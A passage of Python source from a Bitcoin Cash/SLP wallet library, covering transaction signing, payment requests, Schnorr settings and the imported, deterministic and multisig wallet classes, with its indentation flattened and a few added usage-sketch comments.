if self.network:
# Note: synchronizer and verifier will remove themselves from the
# network thread the next time they run, as a result of the below
# release() calls.
# It is done this way (as opposed to an immediate clean-up here)
# because these objects need to do their clean-up actions in a
# thread-safe fashion from within the thread where they normally
# operate on their data structures.
self.cashacct.stop()
self.synchronizer.release()
self.verifier.release()
self.synchronizer = None
self.verifier = None
self.stop_pruned_txo_cleaner_thread()
# Now no references to the synchronizer or verifier
# remain so they will be GC-ed
if self.is_slp:
# NB: it's important this be done here after network
# callbacks are torn down in the above lines.
self.network.unregister_callback(self._slp_callback_on_status)
jobs_stopped = self.slp_graph_0x01.stop_all_for_wallet(self, timeout=2.0)
self.print_error("Stopped", len(jobs_stopped), "slp_0x01 jobs")
#jobs_stopped = self.slp_graph_0x01_nft.stop_all_for_wallet(self)
#self.print_error("Stopped", len(jobs_stopped), "slp_0x01_nft jobs")
self.slp_graph_0x01_nft.kill()
self.slp_graph_0x01, self.slp_graph_0x01_nft = None, None
self.storage.put('stored_height', self.get_local_height())
self.save_network_state()
def save_network_state(self):
"""Save all the objects which are updated by the network thread. This is called
periodically by the Android app during long synchronizations.
"""
with self.lock:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.put('frozen_coins', list(self.frozen_coins))
self.storage.write()
def start_pruned_txo_cleaner_thread(self):
self.pruned_txo_cleaner_thread = threading.Thread(target=self._clean_pruned_txo_thread, daemon=True, name='clean_pruned_txo_thread')
self.pruned_txo_cleaner_thread.q = queue.Queue()
self.pruned_txo_cleaner_thread.start()
def stop_pruned_txo_cleaner_thread(self):
t = self.pruned_txo_cleaner_thread
self.pruned_txo_cleaner_thread = None # this also signals a stop
if t and t.is_alive():
t.q.put(None) # signal stop
# if the join times out, it's ok. it means the thread was stuck in
# a network call and it will eventually exit.
t.join(timeout=3.0)
def wait_until_synchronized(self, callback=None, *, timeout=None):
tstart = time.time()
def check_timed_out():
if timeout is not None and time.time() - tstart > timeout:
raise TimeoutException()
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
if callback:
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
callback(msg)
time.sleep(0.1)
check_timed_out()
def wait_for_network():
while not self.network.is_connected():
if callback:
msg = "%s \n" % (_("Connecting..."))
callback(msg)
time.sleep(0.1)
check_timed_out()
# wait until we are connected, because the user
# might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
def can_export(self):
return not self.is_watching_only() and hasattr(self.keystore, 'get_private_key')
def is_used(self, address):
return self.get_address_history(address) and self.is_empty(address)
def is_empty(self, address):
assert isinstance(address, Address)
return not any(self.get_addr_balance(address))
def address_is_old(self, address, age_limit=2):
age = -1
local_height = self.get_local_height()
for tx_hash, tx_height in self.get_address_history(address):
if tx_height == 0:
tx_age = 0
else:
tx_age = local_height - tx_height + 1
if tx_age > age:
age = tx_age
if age > age_limit:
break # ok, it's old. no need to keep looping
return age > age_limit
def cpfp(self, tx, fee, sign_schnorr=None):
''' sign_schnorr is a bool or None for auto '''
sign_schnorr = self.is_schnorr_enabled() if sign_schnorr is None else bool(sign_schnorr)
txid = tx.txid()
for i, o in enumerate(tx.outputs()):
otype, address, value = o
if otype == TYPE_ADDRESS and self.is_mine(address):
break
else:
return
coins = self.get_addr_utxo(address)
item = coins.get(txid+':%d'%i)
if not item:
return
self.add_input_info(item)
inputs = [item]
outputs = [(TYPE_ADDRESS, address, value - fee)]
locktime = self.get_local_height()
# note: no need to call tx.BIP_LI01_sort() here - single input/output
return Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
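# Illustrative sketch (not part of the original code): how a caller might use
# cpfp() above to bump a stuck parent transaction. `wallet`, `parent_tx` and
# `password` are assumed to already exist; the fee is a placeholder in satoshis.
#
#   child_tx = wallet.cpfp(parent_tx, fee=1000)
#   if child_tx is not None:
#       wallet.sign_transaction(child_tx, password)
#       # broadcast child_tx via the network as usual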
def add_input_info(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
# Bitcoin Cash needs value to sign
received, spent = self.get_addr_io(address)
item = received.get(txin['prevout_hash']+':%d'%txin['prevout_n'])
tx_height, value, is_cb = item
txin['value'] = value
self.add_input_sig_info(txin, address)
def add_input_info_for_bitcoinfiles(self, txin):
address = txin['address']
if self.is_mine(address):
txin['type'] = self.get_txin_type(address)
self.add_input_sig_info(txin, address)
def can_sign(self, tx):
if tx.is_complete():
return False
for k in self.get_keystores():
# setup "wallet advice" so Xpub wallets know how to sign 'fd' type tx inputs
# by giving them the sequence number ahead of time
if isinstance(k, BIP32_KeyStore):
for txin in tx.inputs():
for x_pubkey in txin['x_pubkeys']:
if x_pubkey[0:2] not in ['02', '03', '04']:
_, addr = xpubkey_to_address(x_pubkey)
try:
c, index = self.get_address_index(addr)
except:
continue
else:
c, index = k.scan_for_pubkey_index(x_pubkey)
if c == 0:
addr = self.receiving_addresses[index]
elif c == 1:
addr = self.change_addresses[index]
if index is not None:
k.set_wallet_advice(addr, [c,index])
if k.can_sign(tx):
return True
return False
def get_input_tx(self, tx_hash):
# First look up an input transaction in the wallet where it
# will likely be. If co-signing a transaction it may not have
# all the input txs, in which case we ask the network.
tx = self.transactions.get(tx_hash)
if not tx and self.network:
request = ('blockchain.transaction.get', [tx_hash])
tx = Transaction(self.network.synchronous_get(request))
return tx
def add_input_values_to_tx(self, tx):
""" add input values to the tx, for signing"""
for txin in tx.inputs():
if 'value' not in txin:
inputtx = self.get_input_tx(txin['prevout_hash'])
if inputtx is not None:
out_zero, out_addr, out_val = inputtx.outputs()[txin['prevout_n']]
txin['value'] = out_val
txin['prev_tx'] = inputtx # may be needed by hardware wallets
def add_hw_info(self, tx):
# add previous tx for hw wallets, if needed and not already there
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx) and k.needs_prevtx()) for k in self.get_keystores()]):
for txin in tx.inputs():
if 'prev_tx' not in txin:
txin['prev_tx'] = self.get_input_tx(txin['prevout_hash'])
# add output info for hw wallets
info = {}
xpubs = self.get_master_public_keys()
for txout in tx.outputs():
_type, addr, amount = txout
if self.is_change(addr):
index = self.get_address_index(addr)
pubkeys = self.get_public_keys(addr)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
info[addr] = index, sorted_xpubs, self.m if isinstance(self, Multisig_Wallet) else None, self.txin_type
tx.output_info = info
def sign_transaction(self, tx, password, *, use_cache=False, anyonecanpay=False):
""" Sign a transaction, requires password (may be None for password-less
wallets). If `use_cache` is enabled then signing will be much faster.
For transactions with N inputs and M outputs, calculating all sighashes
takes only O(N + M) with the cache, as opposed to O(N^2 + NM) without
the cache.
Warning: If you modify non-signature parts of the transaction
afterwards, do not use `use_cache`! """
if self.is_watching_only():
return
# add input values for signing
self.add_input_values_to_tx(tx)
# hardware wallets require extra info
if any([(isinstance(k, Hardware_KeyStore) and k.can_sign(tx)) for k in self.get_keystores()]):
self.add_hw_info(tx)
# sign
for k in self.get_keystores():
try:
if k.can_sign(tx):
k.sign_transaction(tx, password, use_cache=use_cache, anyonecanpay=anyonecanpay)
except UserCancelled:
continue
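# Illustrative sketch (not part of the original code): using the sighash cache
# described in the docstring above. `wallet`, `tx` and `password` are assumed
# to already exist.
#
#   wallet.sign_transaction(tx, password, use_cache=True)   # O(N + M) sighash work
#   # Per the warning above: if non-signature parts of `tx` are modified after
#   # this call, do not sign again with use_cache=True.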
def get_unused_addresses(self, *, for_change=False, frozen_ok=True):
# fixme: use slots from expired requests
with self.lock:
domain = self.get_receiving_addresses() if not for_change else (self.get_change_addresses() or self.get_receiving_addresses())
return [addr for addr in domain
if not self.get_address_history(addr)
and addr not in self.receive_requests
and (frozen_ok or addr not in self.frozen_addresses)]
def get_unused_address(self, *, for_change=False, frozen_ok=True):
addrs = self.get_unused_addresses(for_change=for_change, frozen_ok=frozen_ok)
if addrs:
return addrs[0]
def get_receiving_address(self, *, frozen_ok=True):
'''Returns a receiving address or None.'''
domain = self.get_unused_addresses(frozen_ok=frozen_ok)
if not domain:
domain = [a for a in self.get_receiving_addresses()
if frozen_ok or a not in self.frozen_addresses]
if domain:
return domain[0]
def get_payment_status(self, address, amount):
local_height = self.get_local_height()
received, sent = self.get_addr_io(address)
l = []
for txo, x in received.items():
h, v, is_cb = x
txid, n = txo.split(':')
info = self.verified_tx.get(txid)
if info:
tx_height, timestamp, pos = info
conf = local_height - tx_height
else:
conf = 0
l.append((conf, v))
vsum = 0
for conf, v in reversed(sorted(l)):
vsum += v
if vsum >= amount:
return True, conf
return False, None
def has_payment_request(self, addr):
''' Returns True iff Address addr has any extant payment requests
(even if expired), False otherwise. '''
assert isinstance(addr, Address)
return bool(self.receive_requests.get(addr))
def get_payment_request(self, addr, config):
assert isinstance(addr, Address)
r = self.receive_requests.get(addr)
if not r:
return
out = copy.copy(r)
addr_text = addr.to_ui_string()
if r.get('token_id', None):
amount_text = str(r['amount'])
else:
amount_text = format_satoshis(r['amount'])
if addr.FMT_UI == addr.FMT_CASHADDR:
out['URI'] = '{}:{}?amount={}'.format(networks.net.CASHADDR_PREFIX,
addr_text, amount_text)
elif addr.FMT_UI == addr.FMT_SLPADDR:
if r.get('token_id', None):
token_id = r['token_id']
out['URI'] = '{}:{}?amount={}-{}'.format(networks.net.SLPADDR_PREFIX,
addr_text, amount_text, token_id)
else:
out['URI'] = '{}:{}?amount={}'.format(networks.net.SLPADDR_PREFIX,
addr_text, amount_text)
status, conf = self.get_request_status(addr)
out['status'] = status
if conf is not None:
out['confirmations'] = conf
# check if bip70 file exists
rdir = config.get('requests_dir')
if rdir:
key = out.get('id', addr.to_storage_string())
path = os.path.join(rdir, 'req', key[0], key[1], key)
if os.path.exists(path):
baseurl = 'file://' + rdir
rewrite = config.get('url_rewrite')
if rewrite:
baseurl = baseurl.replace(*rewrite)
out['request_url'] = os.path.join(baseurl, 'req', key[0], key[1], key, key)
out['URI'] += '&r=' + out['request_url']
if 'index_url' not in out:
out['index_url'] = os.path.join(baseurl, 'index.html') + '?id=' + key
websocket_server_announce = config.get('websocket_server_announce')
if websocket_server_announce:
out['websocket_server'] = websocket_server_announce
else:
out['websocket_server'] = config.get('websocket_server', 'localhost')
websocket_port_announce = config.get('websocket_port_announce')
if websocket_port_announce:
out['websocket_port'] = websocket_port_announce
else:
out['websocket_port'] = config.get('websocket_port', 9999)
return out
def get_request_status(self, key):
r = self.receive_requests.get(key)
if r is None:
return PR_UNKNOWN
address = r['address']
amount = r.get('amount')
timestamp = r.get('time', 0)
if timestamp and type(timestamp) != int:
timestamp = 0
expiration = r.get('exp')
if expiration and type(expiration) != int:
expiration = 0
conf = None
if amount:
if self.up_to_date:
paid, conf = self.get_payment_status(address, amount)
status = PR_PAID if paid else PR_UNPAID
if status == PR_UNPAID and expiration is not None and time.time() > timestamp + expiration:
status = PR_EXPIRED
else:
status = PR_UNKNOWN
else:
status = PR_UNKNOWN
return status, conf
def make_payment_request(self, addr, amount, message, expiration=None, *,
op_return=None, op_return_raw=None, payment_url=None, token_id=None, index_url=None):
assert isinstance(addr, Address)
if op_return and op_return_raw:
raise ValueError("both op_return and op_return_raw cannot be specified as arguments to make_payment_request")
timestamp = int(time.time())
_id = bh2u(Hash(addr.to_storage_string() + "%d" % timestamp))[0:10]
d = {
'time': timestamp,
'amount': amount,
'exp': expiration,
'address': addr,
'memo': message,
'id': _id
}
if token_id:
d['token_id'] = token_id
if payment_url:
d['payment_url'] = payment_url + "/" + _id
if index_url:
d['index_url'] = index_url + "/" + _id
if op_return:
d['op_return'] = op_return
if op_return_raw:
d['op_return_raw'] = op_return_raw
return d
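# Illustrative sketch (not part of the original code): the expected payment
# request lifecycle using the helpers in this class. `wallet`, `config` and
# `addr` are assumed to exist; the amount is a placeholder in satoshis.
#
#   req = wallet.make_payment_request(addr, 100000, "invoice #42", expiration=3600)
#   wallet.add_payment_request(req, config)
#   out = wallet.get_payment_request(addr, config)   # contains 'URI', 'status', etc.
#   wallet.remove_payment_request(addr, config)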
def serialize_request(self, r):
result = r.copy()
result['address'] = r['address'].to_storage_string()
return result
def save_payment_requests(self, write=True):
def delete_address(value):
del value['address']
return value
requests = {addr.to_storage_string() : delete_address(value.copy())
for addr, value in self.receive_requests.items()}
self.storage.put('payment_requests', requests)
self.save_labels() # In case address labels were set or cleared.
if write:
self.storage.write()
def sign_payment_request(self, key, alias, alias_addr, password):
req = self.receive_requests.get(key)
alias_privkey = self.export_private_key(alias_addr, password)
pr = paymentrequest.make_unsigned_request(req)
paymentrequest.sign_request_with_alias(pr, alias, alias_privkey)
req['name'] = to_string(pr.pki_data)
req['sig'] = bh2u(pr.signature)
self.receive_requests[key] = req
self.save_payment_requests()
def add_payment_request(self, req, config, set_address_label=True, save=True):
addr = req['address']
addr_text = addr.to_storage_string()
amount = req['amount']
message = req['memo']
self.receive_requests[addr] = req
if save:
self.save_payment_requests()
if set_address_label:
self.set_label(addr_text, message, save=save) # should be a default label
rdir = config.get('requests_dir')
if rdir and amount is not None:
key = req.get('id', addr_text)
pr = paymentrequest.make_request(config, req)
path = os.path.join(rdir, 'req', key[0], key[1], key)
if not os.path.exists(path):
try:
os.makedirs(path)
except OSError as exc:
if exc.errno != errno.EEXIST:
raise
with open(os.path.join(path, key), 'wb') as f:
f.write(pr.SerializeToString())
# reload
req = self.get_payment_request(addr, config)
req['address'] = req['address'].to_ui_string()
with open(os.path.join(path, key + '.json'), 'w', encoding='utf-8') as f:
f.write(json.dumps(req))
def remove_payment_request(self, addr, config, clear_address_label_if_no_tx=True,
save=True):
if isinstance(addr, str):
addr = Address.from_string(addr)
if addr not in self.receive_requests:
return False
r = self.receive_requests.pop(addr)
if clear_address_label_if_no_tx and not self.get_address_history(addr):
memo = r.get('memo')
# clear it only if the user didn't overwrite it with something else
if memo and memo == self.labels.get(addr.to_storage_string()):
self.set_label(addr, None, save=save)
rdir = config.get('requests_dir')
if rdir:
key = r.get('id', addr.to_storage_string())
for s in ['.json', '']:
n = os.path.join(rdir, 'req', key[0], key[1], key, key + s)
if os.path.exists(n):
os.unlink(n)
if save:
self.save_payment_requests()
return True
def get_sorted_requests(self, config):
m = map(lambda x: self.get_payment_request(x, config), self.receive_requests.keys())
try:
def f(x):
try:
addr = x['address']
return self.get_address_index(addr) or addr
except:
return addr
return sorted(m, key=f)
except TypeError:
# See issue #1231 -- can get inhomogeneous results in the above
# sorting function due to the 'or addr' possible return.
# This can happen if addresses for some reason drop out of the wallet
# while, say, the history rescan is running and it can't yet find
# an address index for an address. In that case we will
# return an unsorted list to the caller.
return list(m)
def get_fingerprint(self):
raise NotImplementedError()
def can_import_privkey(self):
return False
def can_import_address(self):
return False
def can_delete_address(self):
return False
def is_multisig(self):
# Subclass Multisig_Wallet overrides this
return False
def is_hardware(self):
return any([isinstance(k, Hardware_KeyStore) for k in self.get_keystores()])
def add_address(self, address):
assert isinstance(address, Address)
self._addr_bal_cache.pop(address, None) # paranoia, not really necessary -- just want to maintain the invariant that when we modify address history below we invalidate cache.
self.invalidate_address_set_cache()
if address not in self._history:
self._history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.cashacct.on_address_addition(address)
def has_password(self):
return self.storage.get('use_encryption', False)
def check_password(self, password):
self.keystore.check_password(password)
def sign_message(self, address, message, password):
index = self.get_address_index(address)
return self.keystore.sign_message(index, message, password)
def decrypt_message(self, pubkey, message, password):
addr = self.pubkeys_to_address(pubkey)
index = self.get_address_index(addr)
return self.keystore.decrypt_message(index, message, password)
def rebuild_history(self):
''' This is an advanced function for use in the GUI when the user
wants to resync the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self._slp_txo.clear(); self.slpv1_validity.clear(); self.token_types.clear(); self.tx_tokinfo.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is capable of Schnorr signing.
`reason` is an optional list; on a False return, a translated string
explaining why Schnorr isn't possible is inserted into it. '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future, once enough
# time has passed that air-gapped systems are unlikely to still
# lack Schnorr support.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
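# Illustrative sketch (not part of the original code): typical interplay of the
# Schnorr helpers above. `wallet` is assumed to be an open wallet instance.
#
#   reason = []
#   if wallet.is_schnorr_possible(reason):
#       wallet.set_schnorr_enabled(True)        # stored as 2 ('on') in wallet storage
#       assert wallet.is_schnorr_enabled()
#   else:
#       print("Schnorr unavailable:", reason)   # e.g. multisig or hardware wallet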
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def get_change_addresses(self):
return []
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows the user to re-add the key or address
# later, and avoids the situation where the UI erroneously
# says "not verified"!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class Slp_ImportedAddressWallet(ImportedAddressWallet):
# Watch-only wallet of imported addresses
wallet_type = 'slp_imported_addr'
def __init__(self, storage):
self._sorted = None
storage.put('wallet_type', self.wallet_type)
super().__init__(storage)
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Slp_ImportedPrivkeyWallet(ImportedPrivkeyWallet):
# wallet made of imported private keys
wallet_type = 'slp_imported_privkey'
def __init__(self, storage):
storage.put('wallet_type', self.wallet_type)
Abstract_Wallet.__init__(self, storage)
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code; it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
if self.storage.get('auto_maintain_gap', True):
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def __init__(self, storage):
super().__init__(storage)
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Slp_Standard_Wallet(Standard_Wallet):
wallet_type = 'slp_standard'
def __init__(self, storage):
storage.put('wallet_type', self.wallet_type)
super().__init__(storage)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
